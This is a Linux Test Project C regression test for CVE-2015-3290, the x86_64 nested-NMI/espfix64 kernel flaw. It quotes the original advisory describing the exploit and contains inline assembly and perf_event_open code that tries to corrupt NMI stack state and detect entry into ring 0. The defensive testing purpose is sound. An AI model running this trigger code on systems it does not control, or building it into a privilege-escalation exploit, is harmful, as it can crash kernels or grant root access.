• Home
  • Line#
  • Scopes#
  • Navigate#
  • Raw
  • Download
1 // SPDX-License-Identifier: GPL-2.0-or-later
2 /*
3  * Copyright (c) 2017 Pavel Boldin <pboldin@cloudlinux.com>
4  */
5 
6 /*
7 
8 NOTE: rather than checking for full nested NMI exploitation we simply check
9 that the NMI stack state can be corrupted with this code.
10 
11 http://www.openwall.com/lists/oss-security/2015/08/04/8
12 
13 > +++++ CVE-2015-3290 +++++
14 >
15 > High impact NMI bug on x86_64 systems 3.13 and newer, embargoed.  Also fixed
16 by:
17 >
18 > https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a
19 >
20 > The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.
21 >
22 > You can mitigate CVE-2015-3290 by blocking modify_ldt or
23 > perf_event_open using seccomp.  A fully-functional, portable, reliable
24 > exploit is privately available and will be published in a week or two.
25 > *Patch your systems*
26 
27 And here's a real advisory:
28 
29 If an NMI returns via espfix64 and is interrupted during espfix64 setup
30 by another NMI, the return state is corrupt.  This is exploitable for
31 reliable privilege escalation on any Linux x86_64 system in which
32 untrusted code can arrange for espfix64 to be invoked and for NMIs to be
33 nested.
34 
35 Glossing over a lot of details, the basic structure of Linux' nested NMI
36 handling is:
37 
38 nmi_handler:
39     if (in_nmi) {
40 	nmi_latched = true;
41 	return;
42     }
43     in_nmi = true;
44     handle the nmi;
45     atomically (this is magic):
46 	if (nmi_latched) {
47 	    nmi_latched = false;
48 	    start over;
49 	} else {
50 	    in_nmi = false;
51 	    return and unmask NMIs;
52 	}
53 
54 Alas, on x86_64, there is no reasonable way to block NMIs to run the
55 atomic part of that pseudocode atomically.  Instead, the entire atomic
56 piece is implemented by the single instruction IRET.
57 
58 But x86_64 is more broken than just that.  The IRET instruction does not
59 restore register state correctly [1] when returning to a 16-bit stack
60 segment.  x86_64 has a complicated workaround called espfix64.  If
61 espfix64 is invoked on return, a well-behaved IRET is emulated by a
62 complicated scheme that involves manually switching stacks.  During the
63 stack switch, there is a window of approximately 19 instructions between
64 the start of espfix64's access to the original stack and when espfix64
65 is done with the original stack.  If a nested NMI occurs during this
66 window, then the atomic part of the basic nested NMI algorithm is
67 observably non-atomic.
68 
69 Depending on exactly where in this window the nested NMI hits, the
70 results vary.  Most nested NMIs will corrupt the return context and
71 crash the calling process.  Some are harmless except that the nested NMI
72 gets ignored.  There is a two-instruction window in which the return
73 context ends up with user-controlled RIP and CS set to __KERNEL_CS.
74 
75 A careful exploit (attached) can recover from all the crashy failures
76 and can regenerate a valid *privileged* state if a nested NMI occurs
77 during the two-instruction window.  This exploit appears to work
78 reasonably quickly across a fairly wide range of Linux versions.
79 
80 If you have SMEP, this exploit is likely to panic the system.  Writing
81 a usable exploit against a SMEP system would be considerably more
82 challenging, but it's surely possible.
83 
84 Measures like UDEREF are unlikely to help, because this bug is outside
85 any region that can be protected using paging or segmentation tricks.
86 However, recent grsecurity kernels seem to forcibly disable espfix64, so
87 they're not vulnerable in the first place.
88 
89 A couple of notes:
90 
91   - This exploit's payload just prints the text "CPL0".  The exploit
92     will keep going after printing CPL0 so you can enjoy seeing the
93     frequency with which it wins.  Interested parties could easily
94     write different payloads.  I doubt that any existing exploit
95     mitigation techniques would be useful against this type of
96     attack.
97 
98   - If you are using a kernel older than v4.1, a 64-bit build of the
99     exploit will trigger a signal handling bug and crash.  Defenders
100     should not rejoice, because the exploit works fine when build
101     as a 32-bit binary or (so I'm told) as an x32 binary.
102 
103   - This is the first exploit I've ever written that contains genuine
104     hexadecimal code.  The more assembly-minded among you can have
105     fun figuring out why :)
106 
107 [1] By "correctly", I mean that the register state ends up different
108 from that which was saved in the stack frame, not that the
109 implementation doesn't match the spec in the microcode author's minds.
110 The spec is simply broken (differently on AMD and Intel hardware,
111 perhaps unsurprisingly.)
112 
113 --Andy
114 */
115 
116 #include "config.h"
117 #include "tst_test.h"
118 #include "tst_timer.h"
119 
120 #if HAVE_PERF_EVENT_ATTR && (defined(__x86_64__) || defined(__i386__))
121 
122 #include <stdlib.h>
123 #include <stdio.h>
124 #include <inttypes.h>
125 #include <asm/ldt.h>
126 #include <unistd.h>
127 #include <sys/syscall.h>
128 #include <setjmp.h>
129 #include <signal.h>
130 #include <string.h>
131 #include <sys/wait.h>
132 #include <linux/perf_event.h>
133 
134 #include "lapi/syscalls.h"
135 #include "tst_safe_pthread.h"
136 
137 /* Abstractions for some 32-bit vs 64-bit differences. */
138 #ifdef __x86_64__
139 # define REG_IP REG_RIP
140 # define REG_SP REG_RSP
141 # define REG_AX REG_RAX
142 
143 struct selectors {
144 	unsigned short cs, gs, fs, ss;
145 };
146 
147 LTP_ATTRIBUTE_UNUSED
ssptr(ucontext_t * ctx)148 static unsigned short *ssptr(ucontext_t *ctx)
149 {
150 	struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
151 	return &sels->ss;
152 }
153 
154 LTP_ATTRIBUTE_UNUSED
csptr(ucontext_t * ctx)155 static unsigned short *csptr(ucontext_t *ctx)
156 {
157 	struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
158 	return &sels->cs;
159 }
160 #else
161 # define REG_IP  REG_EIP
162 # define REG_SP  REG_ESP
163 # define REG_AX  REG_EAX
164 # define REG_CR2 (REG_SS + 3)
165 
166 LTP_ATTRIBUTE_UNUSED
ssptr(ucontext_t * ctx)167 static greg_t *ssptr(ucontext_t *ctx)
168 {
169 	return &ctx->uc_mcontext.gregs[REG_SS];
170 }
171 
172 LTP_ATTRIBUTE_UNUSED
csptr(ucontext_t * ctx)173 static greg_t *csptr(ucontext_t *ctx)
174 {
175 	return &ctx->uc_mcontext.gregs[REG_CS];
176 }
177 #endif
178 
179 static volatile long expected_rsp;
180 static int running = 1;
181 
set_ldt(void)182 static void set_ldt(void)
183 {
184 	/* Boring 16-bit data segment. */
185 	const struct user_desc data_desc = {
186 		.entry_number    = 0,
187 		.base_addr       = 0,
188 		.limit	   = 0xfffff,
189 		.seg_32bit       = 0,
190 		.contents	= 0, /* Data, expand-up */
191 		.read_exec_only  = 0,
192 		.limit_in_pages  = 0,
193 		.seg_not_present = 0,
194 		.useable	 = 0
195 	};
196 
197 	TEST(tst_syscall(__NR_modify_ldt, 1, &data_desc, sizeof(data_desc)));
198 	if (TST_RET == -EINVAL) {
199 		tst_brk(TCONF | TRERRNO,
200 			"modify_ldt: 16-bit data segments are probably disabled");
201 	} else if (TST_RET != 0) {
202 		tst_brk(TBROK | TRERRNO, "modify_ldt");
203 	}
204 }
205 
try_corrupt_stack(unsigned short orig_ss)206 static void try_corrupt_stack(unsigned short orig_ss)
207 {
208 #ifdef __x86_64__
209 	asm volatile (
210 	      /* A small puzzle for the curious reader. */
211 	      "mov    $2048, %%rbp    \n\t"
212 
213 	      /* Save rsp for diagnostics */
214 	      "mov    %%rsp, %[expected_rsp] \n\t"
215 
216 	      /*
217 	       * Let 'er rip.
218 	       */
219 	      "mov    %[ss], %%ss \n\t"   /* begin corruption */
220 	      "movl   $1000, %%edx    \n\t"
221 	      "1:  decl   %%edx       \n\t"
222 	      "jnz    1b      \n\t"
223 	      "mov    %%ss, %%eax \n\t"   /* grab SS to display */
224 
225 	      /* Did we enter CPL0? */
226 	      "mov    %%cs, %%dx  \n\t"
227 	      "testw  $3, %%dx    \n\t"
228 	      "jnz    2f      \n\t"
229 	      "leaq   3f(%%rip), %%rcx  \n\t"
230 	      "movl   $0x200, %%r11d  \n\t"
231 	      "sysretq	\n\t"
232 	      "2:	     \n\t"
233 
234 	      /*
235 	       * Stop further corruption.  We need to check CPL
236 	       * first because we need RPL == CPL.
237 	       */
238 	      "mov    %[orig_ss], %%ss \n\t"  /* end corruption */
239 
240 	      "subq   $128, %%rsp \n\t"
241 	      "pushfq	 \n\t"
242 	      "testl  $(1<<9),(%%rsp)   \n\t"
243 	      "addq   $136, %%rsp \n\t"
244 	      "jz 3f      \n\t"
245 	      "cmpl   %[ss], %%eax    \n\t"
246 	      "je 4f      \n\t"
247 	      "3:  int3	   \n\t"
248 	      "4:	     \n\t"
249 	      : [expected_rsp] "=m" (expected_rsp)
250 	      : [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
251 		 : "rax", "rcx", "rdx", "rbp", "r11", "flags"
252 	);
253 #else
254 	asm volatile (
255 	      /* A small puzzle for the curious reader. */
256 	      "mov    %%ebp, %%esi    \n\t"
257 	      "mov    $2048, %%ebp    \n\t"
258 
259 	      /* Save rsp for diagnostics */
260 	      "mov    %%esp, %[expected_rsp] \n\t"
261 
262 	      /*
263 	       * Let 'er rip.
264 	       */
265 	      "mov    %[ss], %%ss \n\t"   /* begin corruption */
266 	      "movl   $1000, %%edx    \n\t"
267 	      "1:  .byte 0xff, 0xca   \n\t"   /* decl %edx */
268 	      "jnz    1b      \n\t"
269 	      "mov    %%ss, %%eax \n\t"   /* grab SS to display */
270 
271 	      /* Did we enter CPL0? */
272 	      "mov    %%cs, %%dx  \n\t"
273 	      "testw  $3, %%dx    \n\t"
274 	      "jnz    2f      \n\t"
275 	      ".code64	\n\t"
276 	      "leaq   3f(%%rip), %%rcx \n\t"
277 	      "movl   $0x200, %%r11d  \n\t"
278 	      "sysretl	\n\t"
279 	      ".code32	\n\t"
280 	      "2:	     \n\t"
281 
282 	      /*
283 	       * Stop further corruption.  We need to check CPL
284 	       * first because we need RPL == CPL.
285 	       */
286 	      "mov    %[orig_ss], %%ss \n\t"  /* end corruption */
287 
288 	      "pushf	  \n\t"
289 	      "testl  $(1<<9),(%%esp)   \n\t"
290 	      "addl   $4, %%esp   \n\t"
291 	      "jz 3f      \n\t"
292 	      "cmpl   %[ss], %%eax    \n\t"
293 	      "je 4f      \n\t"
294 	      "3:  int3	   \n\t"
295 	      "4:  mov %%esi, %%ebp   \n\t"
296 	      : [expected_rsp] "=m" (expected_rsp)
297 	      : [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
298 		 : "eax", "ecx", "edx", "esi", "flags"
299 	);
300 #endif
301 }
302 
perf_event_open(struct perf_event_attr * hw_event,pid_t pid,int cpu,int group_fd,unsigned long flags)303 static int perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
304 			   int cpu, int group_fd, unsigned long flags)
305 {
306 	int ret;
307 
308 	ret = tst_syscall(__NR_perf_event_open, hw_event, pid, cpu,
309 			  group_fd, flags);
310 	return ret;
311 }
312 
313 static int event_mlock_kb;
314 static int max_sample_rate;
315 
child_thread(void * arg LTP_ATTRIBUTE_UNUSED)316 static void *child_thread(void *arg LTP_ATTRIBUTE_UNUSED)
317 {
318 	long niter = 0;
319 	unsigned short orig_ss;
320 
321 	struct perf_event_attr pe = {
322 		.size = sizeof(struct perf_event_attr),
323 		.disabled = 0,
324 		.exclude_kernel = 0,
325 		.exclude_hv = 0,
326 		.freq = 1,
327 		.sample_type = PERF_SAMPLE_IP|PERF_SAMPLE_TID|
328 			PERF_SAMPLE_TIME|PERF_SAMPLE_CALLCHAIN|
329 			PERF_SAMPLE_ID|PERF_SAMPLE_PERIOD,
330 	};
331 	/* Workaround bug in GCC 4.4.7 (CentOS6) */
332 	pe.sample_freq = max_sample_rate / 5;
333 
334 	struct {
335 		uint32_t type;
336 		uint64_t config;
337 		const char *name;
338 	} perf_events[] = {
339 		{
340 			.type = PERF_TYPE_HARDWARE,
341 			.config = PERF_COUNT_HW_INSTRUCTIONS,
342 			.name = "hw instructions",
343 		},
344 		{
345 			.type = PERF_TYPE_HARDWARE,
346 			.config = PERF_COUNT_HW_CACHE_REFERENCES,
347 			.name = "hw cache references",
348 		},
349 	};
350 
351 	void *perf_mmaps[ARRAY_SIZE(perf_events)];
352 	unsigned int i;
353 
354 	for (i = 0; i < ARRAY_SIZE(perf_events); i++) {
355 		int fd;
356 
357 		pe.type = perf_events[i].type;
358 		pe.config = perf_events[i].config;
359 
360 		fd = perf_event_open(&pe, 0, -1, -1, 0);
361 		if (fd == -1) {
362 			if (errno == EINVAL || errno == ENOENT ||
363 			    errno == EBUSY)
364 				tst_brk(TCONF | TERRNO,
365 					"no hardware counters");
366 			else
367 				tst_brk(TBROK | TERRNO, "perf_event_open");
368 			/* tst_brk exits */
369 		}
370 
371 		perf_mmaps[i] = SAFE_MMAP(NULL, event_mlock_kb * 1024,
372 					  PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
373 		SAFE_CLOSE(fd);
374 	}
375 
376 	asm volatile ("mov %%ss, %0" : "=rm" (orig_ss));
377 
378 	for (niter = 0; running && niter < 1000*1000*1000L; niter++) {
379 
380 		try_corrupt_stack(orig_ss);
381 
382 		/*
383 		 * If we ended up with IF == 0, there's no easy way to fix
384 		 * it.  Instead, make frequent syscalls to avoid hanging
385 		 * the system.
386 		 */
387 		syscall(0x3fffffff);
388 	}
389 
390 	for (i = 0; i < ARRAY_SIZE(perf_events); i++)
391 		if (perf_mmaps[i] != MAP_FAILED)
392 			SAFE_MUNMAP(perf_mmaps[i], 512 * 1024);
393 
394 	return (void *)niter;
395 }
396 
397 #define TIMEOUT		(180)
398 #define TIME_TO_GIVEUP	(TIMEOUT - 5)
399 #define TIMER_TYPE	CLOCK_MONOTONIC
400 
do_child(void)401 static void do_child(void)
402 {
403 	int i, ncpus;
404 	pthread_t *threads;
405 	long iter, total_iter = 0;
406 
407 	tst_res(TINFO, "attempting to corrupt nested NMI stack state");
408 
409 	set_ldt();
410 
411 	ncpus = tst_ncpus();
412 	threads = SAFE_MALLOC(sizeof(*threads) * ncpus);
413 
414 	for (i = 0; i < ncpus; i++)
415 		SAFE_PTHREAD_CREATE(&threads[i], NULL, child_thread, NULL);
416 
417 	sleep(TIME_TO_GIVEUP);
418 	running = 0;
419 
420 	for (i = 0; i < ncpus; i++) {
421 		SAFE_PTHREAD_JOIN(threads[i], (void **)&iter);
422 		total_iter += iter;
423 	}
424 	free(threads);
425 
426 	tst_res(TPASS, "can't corrupt nested NMI state after %ld iterations",
427 		total_iter);
428 }
429 
setup(void)430 static void setup(void)
431 {
432         /*
433          * According to perf_event_open's manpage, the official way of
434          * knowing if perf_event_open() support is enabled is checking for
435          * the existence of the file /proc/sys/kernel/perf_event_paranoid.
436          */
437 	if (access("/proc/sys/kernel/perf_event_paranoid", F_OK) == -1)
438 		tst_brk(TCONF, "Kernel doesn't have perf_event support");
439 
440 	SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_mlock_kb",
441 			"%d", &event_mlock_kb);
442 	SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_max_sample_rate",
443 			"%d", &max_sample_rate);
444 }
445 
run(void)446 static void run(void)
447 {
448 	pid_t pid;
449 	int status;
450 
451 
452 	pid = SAFE_FORK();
453 	if (pid == 0) {
454 		do_child();
455 		return;
456 	}
457 
458 	SAFE_WAITPID(pid, &status, 0);
459 	if (WIFSIGNALED(status) && WTERMSIG(status) == SIGSEGV)
460 		tst_res(TFAIL, "corrupted NMI stack");
461 	else if (WIFEXITED(status) && WEXITSTATUS(status) != 0)
462 		tst_res(WEXITSTATUS(status), "Propogate child status");
463 }
464 
465 static struct tst_test test = {
466 	.forks_child = 1,
467 	.needs_root = 1,
468 	.needs_checkpoints = 1,
469 	.setup = setup,
470 	.timeout = TIMEOUT,
471 	.test_all = run,
472 	.tags = (const struct tst_tag[]) {
473 		{"linux-git", "9b6e6a8334d5"},
474 		{"CVE", "2015-3290"},
475 		{}
476 	}
477 };
478 
479 #else /* HAVE_PERF_EVENT_ATTR && (defined(__x86_64__) || defined(__i386__)) */
480 
481 TST_TEST_TCONF("no perf_event_attr or not (i386 or x86_64)");
482 
483 #endif
484